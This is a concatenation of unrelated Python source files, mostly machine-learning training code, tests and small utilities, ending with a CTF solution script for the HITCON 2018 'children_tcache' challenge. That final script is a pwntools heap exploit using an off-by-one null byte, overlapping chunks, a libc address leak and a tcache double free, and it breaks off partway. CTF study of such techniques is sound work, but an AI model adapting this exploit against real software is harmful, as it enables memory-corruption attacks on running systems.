for param_s, param_t in zip(self.learn.model.student.parameters(), self.model.teacher.parameters()):
param_t.data = param_t.data * self.tmom + param_s.data * (1. - self.tmom)
def _momentum_update_center(self):
self.model.C = self.model.C*self.cmom + self.cb*(1-self.cmom)
def after_step(self):
"Center and teacher updates"
self._momentum_update_teacher(); self._momentum_update_center()
def after_epoch(self):
"Update tpt at the end of each epoch"
self.tpt = self.tpt_scheduler(self.pct_train)
self.tmom = self.tmom_scheduler(self.pct_train)
if self.epoch == self.freeze_last_layer:
print("Setting last layer to trainable")
for n,p in self.learn.model.student[1].last_layer.named_parameters():
if n == 'weight_v' : p.requires_grad = True
def lf(self, pred, *yb):
"Multi crop cross entropy loss: -qlog(p)"
yb = yb[0]
pred = F.log_softmax(pred / self.tps, dim=-1)
yb = F.softmax((yb - self.model.C) / self.tpt, dim=-1)
n_targs, n_preds = yb.size(0)//self.bs, pred.size(0)//self.bs
yb, pred = yb.chunk(n_targs), pred.chunk(n_preds)
loss, npairs = 0, n_targs*(n_preds-1)
for ti in range(n_targs):
for pi in range(n_preds):
if ti != pi:
loss += (-yb[ti]*pred[pi]).sum(-1).mean() / npairs
return loss
@torch.no_grad()
def show(self, n=1):
xbs = self.learn.xb[0]
idxs = np.random.choice(range(self.bs), n, False)
images = [aug.decode(xb.to('cpu').clone()).clamp(0, 1)[i]
for i in idxs
for xb, aug in zip(xbs, self.augs)]
return show_batch(images[0], None, images, max_n=len(images), nrows=n) |
effects/police.py | vexofp/hyperion | 725 | 12795954 | import hyperion
import time
import colorsys
# Get the parameters
rotationTime = float(hyperion.args.get('rotation-time', 2.0))
colorOne = hyperion.args.get('color_one', (255,0,0))
colorTwo = hyperion.args.get('color_two', (0,0,255))
colorsCount = hyperion.args.get('colors_count', hyperion.ledCount/2)
reverse = bool(hyperion.args.get('reverse', False))
# Check parameters
rotationTime = max(0.1, rotationTime)
colorsCount = min(hyperion.ledCount/2, colorsCount)
# Initialize the led data
hsv1 = colorsys.rgb_to_hsv(colorOne[0]/255.0, colorOne[1]/255.0, colorOne[2]/255.0)
hsv2 = colorsys.rgb_to_hsv(colorTwo[0]/255.0, colorTwo[1]/255.0, colorTwo[2]/255.0)
colorBlack = (0,0,0)
ledData = bytearray()
for i in range(hyperion.ledCount):
if i <= colorsCount:
rgb = colorsys.hsv_to_rgb(hsv1[0], hsv1[1], hsv1[2])
elif (i >= hyperion.ledCount/2-1) & (i < (hyperion.ledCount/2) + colorsCount):
rgb = colorsys.hsv_to_rgb(hsv2[0], hsv2[1], hsv2[2])
else:
rgb = colorBlack
ledData += bytearray((int(255*rgb[0]), int(255*rgb[1]), int(255*rgb[2])))
# Calculate the sleep time and rotation increment
increment = 3
sleepTime = rotationTime / hyperion.ledCount
while sleepTime < 0.05:
increment *= 2
sleepTime *= 2
increment %= hyperion.ledCount
# Switch direction if needed
if reverse:
increment = -increment
# Start the write data loop
while not hyperion.abort():
hyperion.setColor(ledData)
ledData = ledData[-increment:] + ledData[:-increment]
time.sleep(sleepTime)
|
labml_nn/transformers/alibi/experiment.py | BioGeek/annotated_deep_learning_paper_implementations | 3,714 | 12795955 | """
---
title: Attention with Linear Biases (ALiBi) Experiment
summary: This experiment trains an Attention with Linear Biases (ALiBi) based model on Tiny Shakespeare dataset.
---
# [Attention with Linear Biases (ALiBi)](index.html) Experiment
This is an annotated PyTorch experiment to train a [ALiBi model](index.html).
This is based on
[our GPT model](../gpt/index.html).
[](https://app.labml.ai/run/e87bec2a074911ec82cdd1759f10c925)
"""
import torch
from torch.utils.data import DataLoader
from labml import experiment, tracker
from labml.configs import option, calculate
from labml_helpers.datasets.text import SequentialUnBatchedDataset
from labml_nn.transformers.alibi import AlibiMultiHeadAttention
from labml_nn.experiments.nlp_autoregression import transpose_batch
from labml_nn.transformers import TransformerConfigs
from labml_nn.transformers.gpt import Configs as GPTConfigs
class Configs(GPTConfigs):
"""
## Configurations
We extend [GPT configurations](../gpt/index.html) and change the attention mechanism.
"""
# ALiBi based transformer (defined below)
transformer: TransformerConfigs = 'GPT_ALiBi'
# Longer validation set
valid_seq_len: int = 128
valid_loader = 'shuffled_longer_valid_loader'
def other_metrics(self, output: torch.Tensor, target: torch.Tensor):
"""
Log losses at the initial and final tokens
"""
# If there are more tokens that the training sequence length (during validation),
if self.seq_len < output.shape[0]:
# Log the loss at training sequence length
tracker.add(f'loss.{self.seq_len - 1}.', self.loss_func(output[self.seq_len - 1], target[self.seq_len - 1]))
# Log the loss at the first token
tracker.add(f'loss.0.', self.loss_func(output[0], target[0]))
# Log the loss at the final token
tracker.add(f'loss.{int(output.shape[0]) - 1}.', self.loss_func(output[-1], target[-1]))
def _alibi_mha(c: TransformerConfigs):
"""
Create an ALiBi attention module
"""
return AlibiMultiHeadAttention(c.n_heads, c.d_model, dropout_prob=c.dropout)
# Set all attention mechanisms to ALiBi
calculate(TransformerConfigs.encoder_attn, 'alibi_mha', _alibi_mha)
calculate(TransformerConfigs.decoder_attn, 'alibi_mha', _alibi_mha)
calculate(TransformerConfigs.decoder_mem_attn, 'alibi_mha', _alibi_mha)
@option(Configs.valid_loader)
def shuffled_longer_valid_loader(c: Configs):
"""
Shuffled validation data loader with `valid_seq_len` sequence length
"""
return DataLoader(SequentialUnBatchedDataset(text=c.text.valid,
dataset=c.text,
seq_len=c.valid_seq_len),
batch_size=c.batch_size,
collate_fn=transpose_batch,
shuffle=True)
@option(Configs.transformer, 'GPT_ALiBi')
def _transformer_configs(c: Configs):
"""
### ALiBi based Transformer configurations
"""
# We use our
# [configurable transformer implementation](../configs.html#TransformerConfigs)
conf = TransformerConfigs()
# Set the vocabulary sizes for embeddings and generating logits
conf.n_src_vocab = c.n_tokens
conf.n_tgt_vocab = c.n_tokens
# GPT uses GELU activation for position wise feedforward
conf.ffn.activation = 'GELU'
# ALiBi doesn't use positional embeddings
conf.src_embed = 'no_pos'
conf.tgt_embed = 'no_pos'
# Set all attention mechanisms to ALiBi
conf.encoder_attn = 'alibi_mha'
conf.decoder_attn = 'alibi_mha'
conf.decoder_mem_attn = 'alibi_mha'
#
return conf
def main():
# Create experiment
experiment.create(name="gpt_alibi")
# Create configs
conf = Configs()
# Override configurations
experiment.configs(conf, {
# Use character level tokenizer
'tokenizer': 'character',
# Prompt separator is blank
'prompt_separator': '',
# Starting prompt for sampling
'prompt': 'It is ',
# Use Tiny Shakespeare dataset
'text': 'tiny_shakespeare',
# 'text': 'tiny_shakespeare_no_split',
# Use a context size of $128$
'seq_len': 64,
# Use a context size of $128$
'valid_seq_len': 80,
# Train for $32$ epochs
'epochs': 128,
# Batch size $128$
'batch_size': 128,
# Switch between training and validation for $10$ times
# per epoch
'inner_iterations': 10,
# Transformer configurations
'transformer.d_model': 128,
'transformer.ffn.d_ff': 512,
'transformer.n_heads': 8,
'transformer.n_layers': 4,
'transformer.dropout': 0.1,
})
# Set models for saving and loading
experiment.add_pytorch_models({'model': conf.model})
# Start the experiment
with experiment.start():
# Run training
conf.run()
#
if __name__ == '__main__':
main()
|
Chapter_14/simulation_model.py | pauldevos/Mastering-Object-Oriented-Python-Second-Edition | 108 | 12795972 | <reponame>pauldevos/Mastering-Object-Oriented-Python-Second-Edition
#!/usr/bin/env python3.7
"""
Mastering Object-Oriented Python 2e
Code Examples for Mastering Object-Oriented Python 2nd Edition
Chapter 14. Example 1 -- simulation model.
"""
from dataclasses import dataclass, astuple, asdict, field
from typing import Tuple, Iterator
from pathlib import Path
import csv
# Mock Object Model
# =====================
# A set of class hierarchies that we'll use for several examples.
# The content is mostly mocks.
class DealerRule:
def __repr__(self) -> str:
return f"{self.__class__.__name__}()"
class Hit17(DealerRule):
"""Hits soft 17"""
pass
class Stand17(DealerRule):
"""Stands on soft 17"""
pass
class SplitRule:
def __repr__(self) -> str:
return f"{self.__class__.__name__}()"
class ReSplit(SplitRule):
"""Simplistic resplit anything."""
pass
class NoReSplit(SplitRule):
"""Simplistic no resplit."""
pass
class NoReSplitAces(SplitRule):
"""One card only to aces; no resplit."""
pass
@dataclass
class Table:
decks: int
limit: int
dealer: DealerRule
split: SplitRule
payout: Tuple[int, int]
class PlayerStrategy:
def __repr__(self) -> str:
return f"{self.__class__.__name__}()"
class SomeStrategy(PlayerStrategy):
pass
class AnotherStrategy(PlayerStrategy):
pass
class BettingStrategy:
def __repr__(self) -> str:
return f"{self.__class__.__name__}()"
def bet(self) -> int:
raise NotImplementedError("No bet method")
def record_win(self) -> None:
pass
def record_loss(self) -> None:
pass
class Flat(BettingStrategy):
pass
class Martingale(BettingStrategy):
pass
class OneThreeTwoSix(BettingStrategy):
pass
@dataclass
class Player:
play: PlayerStrategy
betting: BettingStrategy
max_rounds: int
init_stake: int
rounds: int = field(init=False)
stake: float = field(init=False)
def __post_init__(self):
self.reset()
def reset(self) -> None:
self.rounds = self.max_rounds
self.stake = self.init_stake
# A mock simulation which is built from the above mock objects.
import random
@dataclass
class Simulate:
"""Mock simulation."""
table: Table
player: Player
samples: int
def __iter__(self) -> Iterator[Tuple]:
"""Yield statistical samples."""
x, y = self.table.payout
blackjack_payout = x / y
for count in range(self.samples):
self.player.reset()
while self.player.stake > 0 and self.player.rounds > 0:
self.player.rounds -= 1
outcome = random.random()
if outcome < 0.579:
self.player.stake -= 1
elif 0.579 <= outcome < 0.883:
self.player.stake += 1
elif 0.883 <= outcome < 0.943:
# a "push"
pass
else:
# 0.943 <= outcome
self.player.stake += blackjack_payout
yield astuple(self.table) + astuple(self.player)
def check(path: Path) -> None:
"""
Validate unit test result file can be read.
:param path: Path to the example output
"""
with path.open("r") as results:
rdr = csv.reader(results)
outcomes = (float(row[10]) for row in rdr)
first = next(outcomes)
sum_0, sum_1 = 1, first
value_min = value_max = first
for value in outcomes:
sum_0 += 1 # value**0
sum_1 += value # value**1
value_min = min(value_min, value)
value_max = max(value_max, value)
mean = sum_1 / sum_0
print(
f"{path}\nMean = {mean:.1f}\n"
f"House Edge = { 1 - mean / 50:.1%}\n"
f"Range = {value_min:.1f} {value_max:.1f}"
)
|
tests/exception_test.py | gglin001/poptorch | 128 | 12795997 | <gh_stars>100-1000
#!/usr/bin/env python3
# Copyright (c) 2020 Graphcore Ltd. All rights reserved.
import pytest
import torch
import poptorch
def harness(setting, Model, args):
opts = poptorch.Options()
if setting == "true":
opts.Precision.enableFloatingPointExceptions(True)
elif setting == "false":
opts.Precision.enableFloatingPointExceptions(False)
poptorch_model = poptorch.inferenceModel(Model(), opts)
if setting == "true":
with pytest.raises(poptorch.Error):
poptorch_model(*args)
else:
poptorch_model(*args)
@pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(),
reason="Floating point exception not supported on model")
@pytest.mark.parametrize("setting", {"default", "true", "false"})
def test_div0(setting):
class Model(torch.nn.Module):
def forward(self, x, y):
return x / y
x = torch.ones(10, 10)
y = torch.zeros(10, 10)
harness(setting, Model, [x, y])
@pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(),
reason="Floating point exception not supported on model")
@pytest.mark.parametrize("setting", {"default", "true", "false"})
def test_mul0inf(setting):
class Model(torch.nn.Module):
def forward(self, x, y):
return x * y
x = torch.zeros(10, 10)
y = torch.div(torch.ones(10, 10), torch.zeros(10, 10))
harness(setting, Model, [x, y])
@pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(),
reason="Floating point exception not supported on model")
@pytest.mark.parametrize("setting", {"default", "true", "false"})
def test_nonreal(setting):
class Model(torch.nn.Module):
def forward(self, x):
return torch.sqrt(x)
x = torch.Tensor([-1, -2])
harness(setting, Model, [x])
@pytest.mark.parametrize("setting", {"default", "true", "false"})
@pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(),
reason="Floating point exception not supported on model")
def test_nan(setting):
class Model(torch.nn.Module):
def forward(self, x, y):
return x > y
x = torch.ones(10, 10)
y = torch.div(torch.zeros(10, 10), torch.zeros(10, 10))
harness(setting, Model, [x, y])
@pytest.mark.parametrize("setting", {"default", "true", "false"})
@pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(),
reason="Floating point exception not supported on model")
def test_ovf(setting):
class Model(torch.nn.Module):
def forward(self, x):
return torch.exp(x)
x = torch.Tensor([3800, 4203])
harness(setting, Model, [x])
|
tests/acceptance/selene_page_factory_test.py | pupsikpic/selene | 572 | 12796012 | <filename>tests/acceptance/selene_page_factory_test.py
# MIT License
#
# Copyright (c) 2015-2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
from selene import have
from selene.support.shared import browser
from tests.integration.helpers.givenpage import GivenPage
empty_page = 'file://{}/../resources/empty.html'.format(
os.path.abspath(os.path.dirname(__file__))
)
def setup_function():
browser.quit()
def teardown_function():
browser.config.browser_name = 'chrome'
browser.quit()
def test_can_init_default_browser_on_visit():
browser.open(empty_page)
GivenPage(browser.driver).opened_with_body(
'''
<h1 id="header">Selene</h1>'''
)
browser.element("#header").should(have.exact_text("Selene"))
assert browser.driver.name == 'chrome'
def test_can_init_custom_browser_on_visit():
browser.config.browser_name = 'firefox'
browser.open(empty_page)
GivenPage(browser.driver).opened_with_body(
'''
<a id="selene_link">Selene site</a>
'''
)
browser.element("#selene_link").should(have.exact_text("Selene site"))
assert browser.driver.name == 'firefox'
def test_can_init_default_browser_after_custom():
browser.open(empty_page)
GivenPage(browser.driver).opened_with_body(
'''
<h1 id="header">Selene</h1>
'''
)
browser.element("#header").should(have.exact_text("Selene"))
assert browser.driver.name == 'chrome'
|
contrib/python/CUBRIDdb/connections.py | eido5/cubrid | 253 | 12796064 | """
This module implements connections for CUBRIDdb. Presently there is
only one class: Connection. Others are unlikely. However, you might
want to make your own subclasses. In most cases, you will probably
override Connection.default_cursor with a non-standard Cursor class.
"""
from CUBRIDdb.cursors import *
import types, _cubrid
class Connection(object):
"""CUBRID Database Connection Object"""
def __init__(self, *args, **kwargs):
'Create a connecton to the database.'
self.charset = ''
kwargs2 = kwargs.copy()
self.charset = kwargs2.pop('charset', 'utf8')
self.connection = _cubrid.connect(*args, **kwargs2)
def __del__(self):
pass
def cursor(self, dictCursor = None):
if dictCursor:
cursorClass = DictCursor
else:
cursorClass = Cursor
return cursorClass(self)
def set_autocommit(self, value):
if not isinstance(value, bool):
raise ValueError("Parameter should be a boolean value")
if value:
switch = 'TRUE'
else:
switch = 'FALSE'
self.connection.set_autocommit(switch)
def get_autocommit(self):
if self.connection.autocommit == 'TRUE':
return True
else:
return False
autocommit = property(get_autocommit, set_autocommit, doc = "autocommit value for current Cubrid session")
def commit(self):
self.connection.commit()
def rollback(self):
self.connection.rollback()
def close(self):
self.connection.close()
def escape_string(self, buf):
return self.connection.escape_string(buf)
|
Python/math/sum_of_digits.py | TechSpiritSS/NeoAlgo | 897 | 12796066 | # Python program to Find the Sum of Digits of a Number
def sum_of_digits(num):
# Extracting Each digits
# and compute thier sum in 's'
s = 0
while num != 0:
s = s + (num % 10)
num = num // 10
return s
if __name__ == '__main__':
# Input the number And
# Call the function
print("Enter the number: ", end="")
n = int(input())
S = sum_of_digits(abs(n))
print("The sum of digits of the given number is {}.".format(S))
'''
Time Complexity: O(log(num)), where "num" is the length of the given number
Space Complexity: O(1)
SAMPLE INPUT AND OUTPUT
SAMPLE 1
Enter the number: -12
The sum of digits of the given number is 3.
SAMPLE 2
Enter the number: 43258
The sum of digits of the given number is 22.
'''
|
monitor/utils/mail.py | laozhudetui/wam | 227 | 12796105 | #!/usr/bin/env python
# coding: utf-8
# __buildin__ modules
import smtplib
from email.mime.text import MIMEText
from monitor.utils.settings import EMAIL_SERVER
from monitor.utils.settings import EMAIL_PORT
from monitor.utils.settings import EMAIL_USER
from monitor.utils.settings import EMAIL_PASS
from monitor.utils.settings import EMAIL_FROM_ADDR
from monitor.utils.email_list import EMAIL_LIST
def _sendmail(to_list, subject, content):
"""
params:
to_addr[list]:
subject[str]:
content[str]: plain content
"""
msg = MIMEText(content, 'plain', 'utf-8')
msg['Subject'] = subject
msg['From'] = EMAIL_FROM_ADDR
msg['To'] = ', '.join(to_list)
smtp = smtplib.SMTP_SSL()
smtp.set_debuglevel(0)
smtp.connect(EMAIL_SERVER, EMAIL_PORT)
smtp.login(EMAIL_USER, EMAIL_PASS)
smtp.sendmail(EMAIL_FROM_ADDR, to_list, msg.as_string())
smtp.quit()
def sendmail(subject, content):
"""
params:
subject[str]:
content[str]: plain content
"""
if EMAIL_LIST:
_sendmail(EMAIL_LIST, subject, content)
else:
raise ValueError('email list is empty')
|
pl_bolts/callbacks/ssl_online.py | Aayush-Jain01/lightning-bolts | 504 | 12796109 | <filename>pl_bolts/callbacks/ssl_online.py
from contextlib import contextmanager
from typing import Any, Dict, Optional, Sequence, Tuple, Union
import torch
from pytorch_lightning import Callback, LightningModule, Trainer
from pytorch_lightning.utilities import rank_zero_warn
from torch import Tensor, nn
from torch.nn import functional as F
from torch.optim import Optimizer
from torchmetrics.functional import accuracy
from pl_bolts.models.self_supervised.evaluator import SSLEvaluator
class SSLOnlineEvaluator(Callback): # pragma: no cover
"""Attaches a MLP for fine-tuning using the standard self-supervised protocol.
Example::
# your datamodule must have 2 attributes
dm = DataModule()
dm.num_classes = ... # the num of classes in the datamodule
dm.name = ... # name of the datamodule (e.g. ImageNet, STL10, CIFAR10)
# your model must have 1 attribute
model = Model()
model.z_dim = ... # the representation dim
online_eval = SSLOnlineEvaluator(
z_dim=model.z_dim
)
"""
def __init__(
self,
z_dim: int,
drop_p: float = 0.2,
hidden_dim: Optional[int] = None,
num_classes: Optional[int] = None,
dataset: Optional[str] = None,
):
"""
Args:
z_dim: Representation dimension
drop_p: Dropout probability
hidden_dim: Hidden dimension for the fine-tune MLP
"""
super().__init__()
self.z_dim = z_dim
self.hidden_dim = hidden_dim
self.drop_p = drop_p
self.optimizer: Optional[Optimizer] = None
self.online_evaluator: Optional[SSLEvaluator] = None
self.num_classes: Optional[int] = None
self.dataset: Optional[str] = None
self.num_classes: Optional[int] = num_classes
self.dataset: Optional[str] = dataset
self._recovered_callback_state: Optional[Dict[str, Any]] = None
def setup(self, trainer: Trainer, pl_module: LightningModule, stage: Optional[str] = None) -> None:
if self.num_classes is None:
self.num_classes = trainer.datamodule.num_classes
if self.dataset is None:
self.dataset = trainer.datamodule.name
def on_pretrain_routine_start(self, trainer: Trainer, pl_module: LightningModule) -> None:
# must move to device after setup, as during setup, pl_module is still on cpu
self.online_evaluator = SSLEvaluator(
n_input=self.z_dim,
n_classes=self.num_classes,
p=self.drop_p,
n_hidden=self.hidden_dim,
).to(pl_module.device)
# switch fo PL compatibility reasons
accel = (
trainer.accelerator_connector
if hasattr(trainer, "accelerator_connector")
else trainer._accelerator_connector
)
if accel.is_distributed:
if accel.use_ddp:
from torch.nn.parallel import DistributedDataParallel as DDP
self.online_evaluator = DDP(self.online_evaluator, device_ids=[pl_module.device])
elif accel.use_dp:
from torch.nn.parallel import DataParallel as DP
self.online_evaluator = DP(self.online_evaluator, device_ids=[pl_module.device])
else:
rank_zero_warn(
"Does not support this type of distributed accelerator. The online evaluator will not sync."
)
self.optimizer = torch.optim.Adam(self.online_evaluator.parameters(), lr=1e-4)
if self._recovered_callback_state is not None:
self.online_evaluator.load_state_dict(self._recovered_callback_state["state_dict"])
self.optimizer.load_state_dict(self._recovered_callback_state["optimizer_state"])
def to_device(self, batch: Sequence, device: Union[str, torch.device]) -> Tuple[Tensor, Tensor]:
# get the labeled batch
if self.dataset == "stl10":
labeled_batch = batch[1]
batch = labeled_batch
inputs, y = batch
# last input is for online eval
x = inputs[-1]
x = x.to(device)
y = y.to(device)
return x, y
def shared_step(
self,
pl_module: LightningModule,
batch: Sequence,
):
with torch.no_grad():
with set_training(pl_module, False):
x, y = self.to_device(batch, pl_module.device)
representations = pl_module(x).flatten(start_dim=1)
# forward pass
mlp_logits = self.online_evaluator(representations) # type: ignore[operator]
mlp_loss = F.cross_entropy(mlp_logits, y)
acc = accuracy(mlp_logits.softmax(-1), y)
return acc, mlp_loss
def on_train_batch_end(
self,
trainer: Trainer,
pl_module: LightningModule,
outputs: Sequence,
batch: Sequence,
batch_idx: int,
dataloader_idx: int,
) -> None:
train_acc, mlp_loss = self.shared_step(pl_module, batch)
# update finetune weights
mlp_loss.backward()
self.optimizer.step()
self.optimizer.zero_grad()
pl_module.log("online_train_acc", train_acc, on_step=True, on_epoch=False)
pl_module.log("online_train_loss", mlp_loss, on_step=True, on_epoch=False)
def on_validation_batch_end(
self,
trainer: Trainer,
pl_module: LightningModule,
outputs: Sequence,
batch: Sequence,
batch_idx: int,
dataloader_idx: int,
) -> None:
val_acc, mlp_loss = self.shared_step(pl_module, batch)
pl_module.log("online_val_acc", val_acc, on_step=False, on_epoch=True, sync_dist=True)
pl_module.log("online_val_loss", mlp_loss, on_step=False, on_epoch=True, sync_dist=True)
def on_save_checkpoint(self, trainer: Trainer, pl_module: LightningModule, checkpoint: Dict[str, Any]) -> dict:
return {"state_dict": self.online_evaluator.state_dict(), "optimizer_state": self.optimizer.state_dict()}
def on_load_checkpoint(self, trainer: Trainer, pl_module: LightningModule, callback_state: Dict[str, Any]) -> None:
self._recovered_callback_state = callback_state
@contextmanager
def set_training(module: nn.Module, mode: bool):
"""Context manager to set training mode.
When exit, recover the original training mode.
Args:
module: module to set training mode
mode: whether to set training mode (True) or evaluation mode (False).
"""
original_mode = module.training
try:
module.train(mode)
yield module
finally:
module.train(original_mode)
|
GCC-paddle/gcc/models/emb/from_numpy.py | S-HuaBomb/Contrib | 243 | 12796123 | <reponame>S-HuaBomb/Contrib
import random
import networkx as nx
import numpy as np
class Zero(object):
def __init__(self, hidden_size, **kwargs):
self.hidden_size = hidden_size
def train(self, G):
return np.zeros((G.number_of_nodes(), self.hidden_size))
class FromNumpy(object):
def __init__(self, hidden_size, emb_path, **kwargs):
super(FromNumpy, self).__init__()
self.hidden_size = hidden_size
self.emb = np.load(emb_path)
def train(self, G):
id2node = dict([(vid, node) for vid, node in enumerate(G.nodes())])
embeddings = np.asarray([self.emb[id2node[i]] for i in range(len(id2node))])
assert G.number_of_nodes() == embeddings.shape[0]
return embeddings
class FromNumpyGraph(FromNumpy):
def train(self, G):
assert G is None
return self.emb
class FromNumpyAlign(object):
def __init__(self, hidden_size, emb_path_1, emb_path_2, **kwargs):
self.hidden_size = hidden_size
self.emb_1 = np.load(emb_path_1)
self.emb_2 = np.load(emb_path_2)
self.t1, self.t2 = False, False
def train(self, G):
if G.number_of_nodes() == self.emb_1.shape[0] and not self.t1:
emb = self.emb_1
self.t1 = True
elif G.number_of_nodes() == self.emb_2.shape[0] and not self.t2:
emb = self.emb_2
self.t2 = True
else:
raise NotImplementedError
id2node = dict([(vid, node) for vid, node in enumerate(G.nodes())])
embeddings = np.asarray([emb[id2node[i]] for i in range(len(id2node))])
return embeddings
|
src/yolo4/BaseModel.py | xiao9616/yolo4_tensorflow2 | 212 | 12796167 | # =============================================
# -*- coding: utf-8 -*-
# @Time : 2020/5/14 上午10:50
# @Author : xiao9616
# @Email : <EMAIL>
# @File : BaseModel.py
# @Software: PyCharm
# ============================================
import logging
import tensorflow as tf
import os
from src.yolo4.config import *
from src.yolo4.util import *
from src.yolo4.Net import YOLO4_NET
from src.yolo4.Loss import YOLO4_LOSS
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S', filename="./yolo4/logs/train.log", filemode='w+')
class BaseModel(object):
'''
一个自定义的类,需要重写方法:
'''
def data_generator(self):
'''
Returns:该方法可以重写, 并且返回一个tf.data对象
'''
txt_data = tf.data.TextLineDataset(filenames=train_path)
count = 0
for _ in txt_data:
count += 1
train_data = txt_data.batch(batch_size=batch_size)
return train_data, count
def net_generator(self):
net = YOLO4_NET()
return net
def loss_generator(self):
loss = YOLO4_LOSS()
return loss
def optimizer_generator(self):
lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
initial_learning_rate=0.001,
decay_steps=3000,
decay_rate=0.96,
staircase=True
)
optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule)
return optimizer
def metric_generator(self):
metric = tf.keras.metrics.Mean()
return metric
def train(self):
# GPU 设置
tf.debugging.set_log_device_placement(True)
if use_gpu:
gpus = tf.config.experimental.list_physical_devices(device_type="GPU")
if gpus:
logging.info("use gpu device")
# gpu显存分配
for gpu in gpus:
tf.config.experimental.set_memory_growth(device=gpu, enable=True)
tf.print(gpu)
else:
os.environ["CUDA_VISIBLE_DEVICE"] = "-1"
logging.info("not found gpu device,convert to use cpu")
else:
logging.info("use cpu device")
# 禁用gpu
os.environ["CUDA_VISIBLE_DEVICE"] = "-1"
# 训练数据
train_dataset, train_count = self.data_generator()
# 网络结构
net = self.net_generator()
net.summary()
global fine_tune_epoch
# 是否finetune
if fine_tune:
net.load_weights(filepath=weights_path + "epoch-{}".format(fine_tune_epoch))
print("load {} epoch weigth".format(fine_tune))
else:
fine_tune_epoch = -1
print("train model from init")
# 设置loss损失函数
loss = self.loss_generator()
# 设置优化器optimizer
optimizer = self.optimizer_generator()
# 设置评价指标
metric = self.metric_generator()
# 模型训练与更新
for epoch in range(fine_tune_epoch + 1, train_epochs):
step = 0
for train_dataset_batch in train_dataset:
# print(train_dataset_batch)
step += 1
images, boxes = parse_dataset_batch(dataset=train_dataset_batch)
image_batch = process_image_batch(images)
label_batch = generate_label_batch(boxes)
with tf.GradientTape() as tape:
out = net(image_batch)
total_loss = loss(y_true=label_batch, y_pred=out)
gradients = tape.gradient(total_loss, net.trainable_variables)
optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables))
metric.updates(values=total_loss)
print("Epoch: {}/{}, step: {}/{} ,loss: {:.5f}".format(
epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result()
))
metric.reset_states()
if epoch % save_frequency == 0:
net.save_weights(filepath=weights_path + "epoch-{}".format(epoch), save_format='tf')
net.save_weights(filepath=weights_path + "epoch-{}".format(train_epochs), save_format='tf')
if __name__ == '__main__':
yolo = BaseModel()
yolo.train()
|
packages/core/minos-microservice-networks/minos/networks/brokers/handlers/__init__.py | bhardwajRahul/minos-python | 247 | 12796186 | from .impl import (
BrokerHandler,
)
from .ports import (
BrokerHandlerService,
BrokerPort,
)
|
HITCON/2018/children_tcache/exploit.py | Per5ianCat/ctf-writeups | 476 | 12796193 | #!/usr/bin/env python
from pwn import *
def new_heap(size, data, attack=False):
p.sendlineafter('Your choice: ', '1')
p.sendlineafter('Size:', str(size))
if attack:
return
p.sendafter('Data:', data)
if len(data) < size:
p.sendline()
def show_heap(index):
p.sendlineafter('Your choice: ', '2')
p.sendlineafter('Index:', str(index))
def delete_heap(index):
p.sendlineafter('Your choice: ', '3')
p.sendlineafter('Index:', str(index))
with context.quiet:
# hitcon{l4st_rem41nd3r_1s_v3ry_us3ful}
# p = remote('192.168.127.12', 8763)
p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'})
# table[0] => chunk_0 (0x511)
new_heap(0x500, 'a' * 0x4ff)
# table[1] => chunk_1 (0x71)
new_heap(0x68, 'b' * 0x67)
# table[2] => chunk_2 (0x601)
new_heap(0x5f0, 'c' * 0x5ef)
# table[3] => chunk_3 (0x31)
# this chunk is for preventing consolidation of previous
# chunks with the top chunk
new_heap(0x20, 'd' * 0x20)
# we need to delete chunk_1, so we can re-allocate it again
# in order to launch off-by-one (poison-null-byte) attack
delete_heap(1)
# chunk_0 should we freed so it can be consolidated with chunk_2 later
delete_heap(0)
# when we free a chunk, programs writes 0xDA to the whole chunk
# so, we need to zero out some parts of the chunk_1. Therefore,
# we are allocating/freeing the chunk_1 multiple times with different sizes
# interestingly, it always have chunk size of 0x71, but the program only cares
# about the input size
for i in range(9):
# table[0] => chunk_1 (0x71)
# this causes strcpy writes null byte at the end of buffer.
# when i == 0, off-by-one happens and turn size of chunk_2 from
# 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit.
new_heap(0x68 - i, 'b' * (0x68 - i))
# we need to free the chunk, so malloc returns it on the next new_heap call
delete_heap(0)
# table[0] => chunk_1 (0x71)
# this set the prev_size field of chunk_2
new_heap(0x68, 'b' * 0x60 + p64(0x580))
# when we free chunk_2, it consolidates with chunk_0
# therefore, we have a overlapping free chunk with chunk_1
# the resulting big chunk will be put in the unsorted bin
delete_heap(2)
# table[1] => chunk_4 (0x511)
# this will use the unsorted bin for allocation, and writes
# a libc address into chunk_1 fd/bk fields
new_heap(0x508, 'e' * 0x507)
# viwing chunk_1 will leak libc address
show_heap(0)
libc_addr = p.recvuntil('\n$$')[:-3]
libc_base = u64(libc_addr + '\x00' * (8 - len(libc_addr))) - 0x3ebca0
print 'libc base: {}'.format(hex(libc_base))
# table[2] => chunk_5 (0x71)
# this will allocate chunk_5 exactly in the same place as chunk_1
new_heap(0x68, 'f' * 0x67)
# we used tcache_dup attack here which is due to double free
